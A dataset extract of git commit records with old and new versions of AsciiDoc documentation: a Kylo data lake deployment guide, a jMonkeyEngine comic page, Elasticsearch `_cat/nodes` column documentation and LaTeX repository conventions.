\/opt\/thinkbig\/setup\/dev\/cleanupCategory.sh customers\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5df69aa9364b4c6bc2cd8910e25b05b89a79fb5b","subject":"more changes to deployment guide","message":"more changes to deployment guide\n","repos":"claudiu-stanciu\/kylo,rashidaligee\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo,peter-gergely-horvath\/kylo,claudiu-stanciu\/kylo,claudiu-stanciu\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,Teradata\/kylo,Teradata\/kylo,peter-gergely-horvath\/kylo,rashidaligee\/kylo,rashidaligee\/kylo,Teradata\/kylo,claudiu-stanciu\/kylo,Teradata\/kylo","old_file":"docs\/latest\/deployment-guide.adoc","new_file":"docs\/latest\/deployment-guide.adoc","new_contents":"= Data Lake Accelerator Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the data lake accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nThe Data Lake Accelerator services should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySQL\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on 1 edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing to a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. 
Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTIP: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place on the host linux machine you want to install the data lake accelerator services on. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing elasticsearch installation or follow the steps in the elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n NOTE: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n \/opt\/nifi\/ext-config\/config.properties\n\n spring.activemq.broker-url\n\n \/opt\/thinkbig\/thinkbig-services\/conf\/application\/properties\n\n jms.activemq.broker.url\n\n\n7. Install NiFI\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. 
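As a minimal illustration, overriding the server port (the `server.port` property listed in the table below) would look like this in application.properties:\n\n server.port=8400\n\n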
You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== My SQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting of the Pipeline Controller Service using the PIPELINE_APPLICATION_OPTS environment variable. \n\n export THINKBIG_UI_OPTS=Xmx4g\n export THINKBIG_SERVICES_OPTS=Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: These below are installed as services and should start and stop automatically when the machine is rebooted\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","old_contents":"= Pipeline Controller Deployment Guide\nThink Big Analytics\nMay 2016\n\n:toc:\n:toclevels: 2\n:toc-title: Contents\n\n== About\n\nThis document explains how to install the data lake accelerator framework as well as Elasticsearch, NiFi, and ActiveMQ. 
There are a few different ways you can\ninstall it depending on whether or not you are installing all components on one edge node vs. multiple nodes.\n\n== System Requirements\n\n=== Dependencies\n\nPipeline Controller should be installed on an edge node. The following should be available prior to the installing the Data Lake Starter.\n\n.Dependencies\n|===\n|Redhat\/GNU\/Linux distributions\n|RPM (for install)\n|Java 1.7 (or greater)\n|Hadoop 2.4+\n|Spark 1.5.x+\n|Apache NiFi 0.5+ (or Hortonworks DataFlow)\n|Hive\n|MySql\n|===\n\n.Tested Platforms\n|===\n|Platform|URL|Version\n\n|Hortonworks Sandbox|http:\/\/hortonworks.com\/products\/hortonworks-sandbox\/| HDP 2.3, 2.4\n|===\n\n== Installation\n\n=== Procedure for installing all components on 1 edge node\n\nFollow the steps below to install the data lake accelerator. This procedure is also recommended for installing in a Hortonworks sandbox.\n\n\n. Login to the the host using root or sudo access\n\n. Find and download the RPM file from artifactory and place on the host linux machine. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n. Run RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n. Run the setup wizard - \/opt\/thinkbig\/setup\/setup-wizard.sh\n\n Follow the directions and it will install the following:\n * MySQL or Postgres scripts into the local database\n * Elasticsearch\n * ActiveMQ\n * NiFi and the Think Big dependencies\n\n Elasticsearch, NiFi, and ActiveMQ will be started when the wizard is finished\n\n. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\nTip: See section below on how to use the cleanup script to completely remove all of the components above. This is useful in a DEV or sandbox environment so you can run a clean install.\n\n=== Procedure for installing each component manually\n\nFollow the steps below to install the data lake accelerator manually. This method is useful if you are deploying products across multiple edge nodes\n\n\n1. For each step login to the the host using root or sudo access\n\n2. Find and download the RPM file from artifactory and place on the host linux machine you want to install the data lake accelerator services on. You can right click the download link and copy the url to use wget instead\n\n http:\/\/54.152.98.43:8080\/artifactory\/webapp\/search\/artifact\/?7&q=thinkbig-datalake-accelerator (requires VPN)\n\n3. Run data lake accelerator RPM install\n\n $ rpm -ivh thinkbig-datalake-accelerator-<version>.noarch.rpm\n\n4. Run the database scripts (see database configuration section)\n\n\n5. Install Elasticsearch\n\n You can leverage an existing elasticsearch installation or follow the steps in the elasticsearch script used by the wizard.\n\n \/opt\/thinkbig\/setup\/elasticsearch\/install-elasticsearch.sh\n\n6. Install ActiveMQ\n\n You can leverage an existing ActiveMQ installation or follow the steps in the ActiveMQ script used by the wizard\n\n \/opt\/thinkbig\/setup\/activemq\/install-activemq.sh\n\n Note: If installing on a different node than NiFi and thinkbig-services you will need to update the following properties\n \/opt\/nifi\/ext-config\/config.properties\n spring.activemq.broker-url\n \/opt\/thinkbig\/thinkbig-services\/conf\/application\/properties\n jms.activemq.broker.url\n\n7. 
Install NiFI\n\n You can leverage an existing NiFi installation or follow the steps in the setup directory which is used by the wizard. There are two steps:\n\n 1. Install NiFi\n \/opt\/thinkbig\/setup\/nifi\/install-nifi.sh\n\n 2. Install Think Big specific components\n \/opt\/thinkbig\/setup\/nifi\/install-thinkbig-components.sh\n\n8. Start the 3 Think Big applications\n\n $ \/opt\/thinkbig\/start-thinkbig-apps.sh\n\n At this point all applications should be running\n\n== Configuration\n\n=== Configuration Files\n\nConfiguration for the data lake accelerator services are located under the following files:\n\n \/opt\/thinkbig\/thinkbig-ui\/conf\/application.properties\n \/opt\/thinkbig\/thinkbig-services\/conf\/application.properties\n\n\n=== Configuration Properties\n\nBelow is a list of the properties provided by the Pipeline Controller that can be used in the application.properties\nfile. You can use externalized configuration from command line arguments, for example '--spring.config.location=classpath:\/override.properties'.\nSee http:\/\/docs.spring.io\/spring-boot\/docs\/current\/reference\/html\/boot-features-external-config.html for details.\n\n\n.Server Configuration Properties\n|===\n|Configuration Property|Required|Example\n\n|server.port||8400\n|||\n|===\n\n=== Database Setup\n\nData lake services can be configured to work with Postgres or MySQL. Database and permission setup scripts are provided to assist in the initial configuration process. The script names relevant to setup are below:\n\n==== My SQL\n|===\n|Script Name|Description\n|\/opt\/thinkbig\/setup\/sql\/mysql\/setup-mysql.sh|Create tables used by data lake accelerator services\n|\/opt\/thinkbig\/setup\/sql\/mysql\/drop-mysql.sh DROP|Used to remove the data lake accelerator schema(s)\n|===\n\n\n==== Postgres\nTBD - Not yet supported\n\n\n=== Optimizing Performance\n\nYou can adjust the memory setting of the Pipeline Controller Service using the PIPELINE_APPLICATION_OPTS environment variable. \n\n export THINKBIG_UI_OPTS=Xmx4g\n export THINKBIG_SERVICES_OPTS=Xmx4g\n \nThe setting above would set the Java maximum heap size to 4 GB. \n\n\n== Starting the Services\nNote: These below are installed as services and should start and stop automatically when the machine is rebooted\n\nFor starting and stopping the 3 data lake accelerator services there you can run the following scripts\n\n \/opt\/thinkbig\/start-thinkbig-apps.sh\n \/opt\/thinkbig\/stop-thinkbig-apps.sh\n\n1. To Start individual services\n\n $ service activemq start\n $ service elasticsearch start\n $ service nifi start\n $ service thinkbig-spark-shell start\n $ service thinkbig-services start\n $ service thinkbig-ui start\n\n2. To Stop individual services\n\n $ service activemq stop\n $ service elasticsearch stop\n $ service nifi stop\n $ service thinkbig-spark-shell stop\n $ service thinkbig-services stop\n $ service thinkbig-ui stop\n\n3. To get the status of individual services\n\n $ service activemq status\n $ service elasticsearch status\n $ service nifi status\n $ service thinkbig-spark-shell status\n $ service thinkbig-services status\n $ service thinkbig-ui status\n\n== Viewing Service Output\n\n=== Configuring Log Output\n\nLog output for the services mentioned above are configured at:\n\n\t\t\t\/opt\/thinkbig\/thinkbig-ui\/conf\/log4j.properties\n\t\t\t\/opt\/thinkbig\/thinkbig-services\/conf\/log4j.properties\n\nYou may place logs where desired according to the 'log4j.appender.file.File' property. 
Note the configuration line:\n\n\t\t\tlog4j.appender.file.File=\/var\/log\/<app>\/<app>.log\n\n=== Viewing Log Output\n\nThe default log locations for the various applications are located at:\n\n\/var\/log\/<service_name>\n\n== Web and REST Access\n\nBelow are the default URL's and ports for the services\n\n Feed Manager and Operations UI\n http:\/\/127.0.0.1:8400\n username: dladmin\n\tpassword: thinkbig\n\n NiFi UI\n http:\/\/127.0.0.1:8079\n\n Elasticsearch REST API\n http:\/\/127.0.0.1:9200\n\n ActiveMQ Admin\n http:\/\/127.0.0.1:8161\/admin\n\n\n== Appendix: Postgres Integration\n\nTBD\n\t\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1ea5bb3af5a81160ea3045c3deca2617d5dfe835","subject":"fix xref","message":"fix xref\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/sdk\/pages\/comic.adoc","new_file":"docs\/modules\/sdk\/pages\/comic.adoc","new_contents":"= jMonkeyEngine -- The Comic Book\n:author:\n:revnumber:\n:revdate: 2020\/04\/11\n:keywords: documentation, tool, sdk\n\n\n\"`Every`\" good open-source project publishes documentation in comic book format. \u2013 zathras\n\nimage:jmonkeyplatform-docu-1.png[jmonkeyplatform-docu-1.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-2.png[jmonkeyplatform-docu-2.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-3.png[jmonkeyplatform-docu-3.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-4.png[jmonkeyplatform-docu-4.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-5.png[jmonkeyplatform-docu-5.png,width=\"\",height=\"\"]\n\nSee also: xref:sdk.adoc[Main SDK Documentation Page]\n","old_contents":"= jMonkeyEngine -- The Comic Book\n:author:\n:revnumber:\n:revdate: 2020\/04\/11\n:keywords: documentation, tool, sdk\n\n\n\"`Every`\" good open-source project publishes documentation in comic book format. 
\u2013 zathras\n\nimage:jmonkeyplatform-docu-1.png[jmonkeyplatform-docu-1.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-2.png[jmonkeyplatform-docu-2.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-3.png[jmonkeyplatform-docu-3.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-4.png[jmonkeyplatform-docu-4.png,width=\"\",height=\"\"]\n\nimage:jmonkeyplatform-docu-5.png[jmonkeyplatform-docu-5.png,width=\"\",height=\"\"]\n'''\n\nSee also: <<sdk#,Main SDK Documentation Page>>, <<jme3#,Main Engine Documentation Page>>\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"8008432a3b618327d9aed65e26e6ac6b81c480c0","subject":"[DOCS] Update nodes documentation with all headers","message":"[DOCS] Update nodes documentation with all headers\n\nAdds a table with the exhaustive list of all available headers with a brief description (mostly from `org.elasticsearch.rest.action.cat.RestNodesAction`) so that people do not need to go searching for them in the code like I did, or search through `nodes?help`.\n","repos":"aparo\/elasticsearch,aparo\/elasticsearch,vorce\/es-metrics,vorce\/es-metrics,fubuki\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,fubuki\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,fubuki\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch","old_file":"docs\/reference\/cat\/nodes.asciidoc","new_file":"docs\/reference\/cat\/nodes.asciidoc","new_contents":"[[cat-nodes]]\n== Nodes\n\nThe `nodes` command shows the cluster topology.\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes\nSP4H 4727 192.168.56.30 9300 1.0.1 1.6.0_27 72.1gb 35.4 93.9mb 79 239.1mb 0.45 3.4h d m Boneyard\n_uhJ 5134 192.168.56.10 9300 1.0.1 1.6.0_27 72.1gb 33.3 93.9mb 85 239.1mb 0.06 3.4h d * Athena\nHfDp 4562 192.168.56.20 9300 1.0.1 1.6.0_27 72.2gb 74.5 93.9mb 83 239.1mb 0.12 3.4h d m Zarek\n--------------------------------------------------\n\nThe first few columns tell you where your nodes live. For sanity it\nalso tells you what version of ES and the JVM each one runs.\n\n[source,shell]\n--------------------------------------------------\nnodeId pid ip port version jdk\nu2PZ 4234 192.168.56.30 9300 1.0.1 1.6.0_27\nURzf 5443 192.168.56.10 9300 1.0.1 1.6.0_27\nActN 3806 192.168.56.20 9300 1.0.1 1.6.0_27\n--------------------------------------------------\n\n\nThe next few give a picture of your heap, memory, and load.\n\n[source,shell]\n--------------------------------------------------\ndiskAvail heapPercent heapMax ramPercent ramMax load\n 72.1gb 31.3 93.9mb 81 239.1mb 0.24\n 72.1gb 19.6 93.9mb 82 239.1mb 0.05\n 72.2gb 64.9 93.9mb 84 239.1mb 0.12\n--------------------------------------------------\n\nThe last columns provide ancillary information that can often be\nuseful when looking at the cluster as a whole, particularly large\nones. How many master-eligible nodes do I have? How many client\nnodes? It looks like someone restarted a node recently; which one was\nit?\n\n[source,shell]\n--------------------------------------------------\nuptime data\/client master name\n 3.5h d m Boneyard\n 3.5h d * Athena\n 3.5h d m Zarek\n--------------------------------------------------\n\n[float]\n=== Columns\n\nBelow is an exhaustive list of the existing headers that can be\npassed to `nodes?h=` to retrieve the relevant details in ordered\ncolumns. 
If no headers are specified, then those marked to Appear\nby Default will appear. If any header is specified, then the defaults\nare not used.\n\nAliases can be used in place of the full header name for brevity.\nColumns appear in the order that they are listed below unless a\ndifferent order is specified (e.g., `h=pid,id` versus `h=id,pid`).\n\nWhen specifying headers, the headers are not placed in the output\nby default. To have the headers appear in the output, use verbose\nmode (`v`). The header name will match the supplied value (e.g.,\n`pid` versus `p`). For example:\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes?v\\&h=id,ip,port,v,m\nid ip port version m\npLSN 192.168.56.30 9300 1.0.1 m\nk0zy 192.168.56.10 9300 1.0.1 m\n6Tyi 192.168.56.20 9300 1.0.1 *\n% curl 192.168.56.10:9200\/_cat\/nodes?h=id,ip,port,v,m\npLSN 192.168.56.30 9300 1.0.1 m\nk0zy 192.168.56.10 9300 1.0.1 m\n6Tyi 192.168.56.20 9300 1.0.1 *\n--------------------------------------------------\n\n[cols=\"<,<,<,<,<\",options=\"header\",]\n|=======================================================================\n|Header |Alias |Appear by Default |Description |Example\n|`id` |`nodeId` |No |Unique node ID |k0zy\n|`pid` |`p` |No |Process ID |13061\n|`host` |`h` |Yes |Host name |n1\n|`ip` |`i` |Yes |IP address |127.0.1.1\n|`port` |`po` |No |Bound transport port |9300\n|`version` |`v` |No |Elasticsearch version |1.0.1\n|`build` |`b` |No |Elasticsearch Build hash |5c03844\n|`jdk` |`j` |No |Running Java version |1.8.0\n|`disk.avail` |`d`, `disk`, `diskAvail` |No |Available disk space |1.8gb\n|`heap.percent` |`hp`, `heapPercent` |No |Used heap percentage |7\n|`heap.max` |`hm`, `heapMax` |No |Maximum configured heap |1015.6mb\n|`ram.percent` |`rp`, `ramPercent` |No |Used total memory percentage |47\n|`ram.max` |`rm`, `ramMax` |No |Total memory |2.9gb\n|`load` |`l` |No |Most recent load average |0.22\n|`uptime` |`u` |No |Node uptime |17.3m\n|`node.role` |`r`, `role`, `dc`, `nodeRole` |Yes |Data node (d); Client\nnode (c) |d\n|`master` |`m` |Yes |Current master (*); master eligible (m) |m\n|`name` |`n` |Yes |Node name |Venom\n|`completion.size` |`cs`, `completionSize` |No |Size of completion |0b\n|`fielddata.memory_size` |`fm`, `fielddataMemory` |No |Used fielddata\ncache memory |0b\n|`fielddata.evictions` |`fe`, `fielddataEvictions` |No |Fielddata cache\nevictions |0\n|`filter_cache.memory_size` |`fcm`, `filterCacheMemory` |No |Used filter\ncache memory |0b\n|`filter_cache.evictions` |`fce`, `filterCacheEvictions` |No |Filter\ncache evictions |0\n|`flush.total` |`ft`, `flushTotal` |No |Number of flushes |1\n|`flush.total_time` |`ftt`, `flushTotalTime` |No |Time spent in flush |1\n|`get.current` |`gc`, `getCurrent` |No |Number of current get\noperations |0\n|`get.time` |`gti`, `getTime` |No |Time spent in get |14ms\n|`get.total` |`gto`, `getTotal` |No |Number of get operations |2\n|`get.exists_time` |`geti`, `getExistsTime` |No |Time spent in\nsuccessful gets |14ms\n|`get.exists_total` |`geto`, `getExistsTotal` |No |Number of successful\nget operations |2\n|`get.missing_time` |`gmti`, `getMissingTime` |No |Time spent in failed\ngets |0s\n|`get.missing_total` |`gmto`, `getMissingTotal` |No |Number of failed\nget operations |1\n|`id_cache.memory_size` |`im`, `idCacheMemory` |No |Used ID cache\nmemory |216b\n|`indexing.delete_current` |`idc`, `indexingDeleteCurrent` |No |Number\nof current deletion operations |0\n|`indexing.delete_time` |`idti`, `indexingDeleteTime` |No 
|Time spent in\ndeletions |2ms\n|`indexing.delete_total` |`idto`, `indexingDeleteTotal` |No |Number of\ndeletion operations |2\n|`indexing.index_current` |`iic`, `indexingIndexCurrent` |No |Number\nof current indexing operations |0\n|`indexing.index_time` |`iiti`, `indexingIndexTime` |No |Time spent in\nindexing |134ms\n|`indexing.index_total` |`iito`, `indexingIndexTotal` |No |Number of\nindexing operations |1\n|`merges.current` |`mc`, `mergesCurrent` |No |Number of current\nmerge operations |0\n|`merges.current_docs` |`mcd`, `mergesCurrentDocs` |No |Number of\ncurrent merging documents |0\n|`merges.current_size` |`mcs`, `mergesCurrentSize` |No |Size of current\nmerges |0b\n|`merges.total` |`mt`, `mergesTotal` |No |Number of completed merge\noperations |0\n|`merges.total_docs` |`mtd`, `mergesTotalDocs` |No |Number of merged\ndocuments |0\n|`merges.total_size` |`mts`, `mergesTotalSize` |No |Size of current\nmerges |0b\n|`merges.total_time` |`mtt`, `mergesTotalTime` |No |Time spent merging\ndocuments |0s\n|`percolate.current` |`pc`, `percolateCurrent` |No |Number of current\npercolations |0\n|`percolate.memory_size` |`pm`, `percolateMemory` |No |Memory used by\ncurrent percolations |0b\n|`percolate.queries` |`pq`, `percolateQueries` |No |Number of\nregistered percolation queries |0\n|`percolate.time` |`pti`, `percolateTime` |No |Time spent\npercolating |0s\n|`percolate.total` |`pto`, `percolateTotal` |No |Total percolations |0\n|`refresh.total` |`rto`, `refreshTotal` |No |Number of refreshes |16\n|`refresh.time` |`rti`, `refreshTime` |No |Time spent in refreshes |91ms\n|`search.fetch_current` |`sfc`, `searchFetchCurrent` |No |Current fetch\nphase operations |0\n|`search.fetch_time` |`sfti`, `searchFetchTime` |No |Time spent in fetch\nphase |37ms\n|`search.fetch_total` |`sfto`, `searchFetchTotal` |No |Number of fetch\noperations |7\n|`search.open_contexts` |`so`, `searchOpenContexts` |No |Open search\ncontexts |0\n|`search.query_current` |`sqc`, `searchFetchCurrent` |No |Current query\nphase operations |0\n|`search.query_time` |`sqti`, `searchFetchTime` |No |Time spent in query\nphase |43ms\n|`search.query_total` |`sqto`, `searchFetchTotal` |No |Number of query\noperations |9\n|`segments.count` |`sc`, `segmentsCount` |No |Number of segments |4\n|`segments.memory` |`sm`, `segmentsMemory` |No |Memory used by\nsegments |1.4kb\n|=======================================================================\n","old_contents":"[[cat-nodes]]\n== Nodes\n\nThe `nodes` command shows the cluster topology.\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes\nSP4H 4727 192.168.56.30 9300 1.0.0.Beta2 1.6.0_27 72.1gb 35.4 93.9mb 79 239.1mb 0.45 3.4h d m Boneyard\n_uhJ 5134 192.168.56.10 9300 1.0.0.Beta2 1.6.0_27 72.1gb 33.3 93.9mb 85 239.1mb 0.06 3.4h d * Athena\nHfDp 4562 192.168.56.20 9300 1.0.0.Beta2 1.6.0_27 72.2gb 74.5 93.9mb 83 239.1mb 0.12 3.4h d m Zarek\n--------------------------------------------------\n\nThe first few columns tell you where your nodes live. 
","old_contents":"[[cat-nodes]]\n== Nodes\n\nThe `nodes` command shows the cluster topology.\n\n[source,shell]\n--------------------------------------------------\n% curl 192.168.56.10:9200\/_cat\/nodes\nSP4H 4727 192.168.56.30 9300 1.0.0.Beta2 1.6.0_27 72.1gb 35.4 93.9mb 79 239.1mb 0.45 3.4h d m Boneyard\n_uhJ 5134 192.168.56.10 9300 1.0.0.Beta2 1.6.0_27 72.1gb 33.3 93.9mb 85 239.1mb 0.06 3.4h d * Athena\nHfDp 4562 192.168.56.20 9300 1.0.0.Beta2 1.6.0_27 72.2gb 74.5 93.9mb 83 239.1mb 0.12 3.4h d m Zarek\n--------------------------------------------------\n\nThe first few columns tell you where your nodes live. For sanity it\nalso tells you what version of ES and the JVM each one runs.\n\n[source,shell]\n--------------------------------------------------\nnodeId pid ip port es jdk\nu2PZ 4234 192.168.56.30 9300 1.0.0.Beta1 1.6.0_27\nURzf 5443 192.168.56.10 9300 1.0.0.Beta1 1.6.0_27\nActN 3806 192.168.56.20 9300 1.0.0.Beta1 1.6.0_27\n--------------------------------------------------\n\n\nThe next few give a picture of your heap, memory, and load.\n\n[source,shell]\n--------------------------------------------------\ndiskAvail heapPercent heapMax ramPercent ramMax load\n 72.1gb 31.3 93.9mb 81 239.1mb 0.24\n 72.1gb 19.6 93.9mb 82 239.1mb 0.05\n 72.2gb 64.9 93.9mb 84 239.1mb 0.12\n--------------------------------------------------\n\nThe last columns provide ancillary information that can often be\nuseful when looking at the cluster as a whole, particularly large\nones. How many master-eligible nodes do I have? How many client\nnodes? It looks like someone restarted a node recently; which one was\nit?\n\n[source,shell]\n--------------------------------------------------\nuptime data\/client master name\n 3.5h d m Boneyard\n 3.5h d * Athena\n 3.5h d m Zarek\n--------------------------------------------------\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"53049f45a7fc31ce3784d55eeb4983d9fee6aeac","subject":"adding first doc","message":"adding first doc\n","repos":"sebivenlo\/latexstuff","old_file":"doc\/conventions.adoc","new_file":"doc\/conventions.adoc","new_contents":"== Conventions in this repository\n\nAs a good software engineer, you avoid work where you can, certainly if it is repetitious. Your computer does a much better job at that.\nYou can even minimize configuration labor when you\nstick to some conventions and use them as in 'convention over configuration'.\n\nThe conventions we use are:\n\n* The output format is always pdf.\n* For every separate target document (pdf-file) there is a separate project, which is contained in a directory of its own.\n* The document that is given as tex-source command line parameter is called `main.tex`.\n* This main.tex file defines the document type, and has a fixed content, which only varies by document-type, like *sebireport* for reports, *sebiarticle* for articles and *sebisheets* for sheets.\n* The actual content is organised in a file called `material.tex`, which `\\input`s or `\\include`s the files that make up the final content.\n\n.main.tex file content\n[source,tex-source]\n----\n\\input{sebireport}\n\\begin{document}\n\\input{material}\n\\end{document}\n----\n\n.material.tex file content (typical)\n[source,tex-source]\n----\n\\input{frontmatter}\n\\input{summary}\n\\pagenumbering{arabic}\n\\input{introduction}\n\\include{chap1}\n\\include{chap2}\n----\n\n* Use `\\include` only for chapters, because of the way they are treated by LaTeX. For one, `\\include` cannot be nested; second, an `\\include` typically forces a page break.\n* Use `\\input` or `\\InputIfFile` for everything else.\n* Use `\\includegraphics[...]{...}` to include figures or tables made up in pdf. Note that only the following file formats are accepted by pdflatex: .png, .pdf and .jpg.\nAny svg file needs to be converted to pdf first.\n
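\nOne convention above deserves a small illustration: the standard LaTeX kernel macro `\\InputIfFileExists` (the `\\InputIfFile` mentioned above appears to be shorthand for it) pulls a file in only when it is present, so optional material does not break the build. A minimal sketch, where `solutions.tex` is a hypothetical file:\n\n[source,tex-source]\n----\n% inputs solutions.tex when present, continues silently otherwise\n\\InputIfFileExists{solutions}{}{}\n----\n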
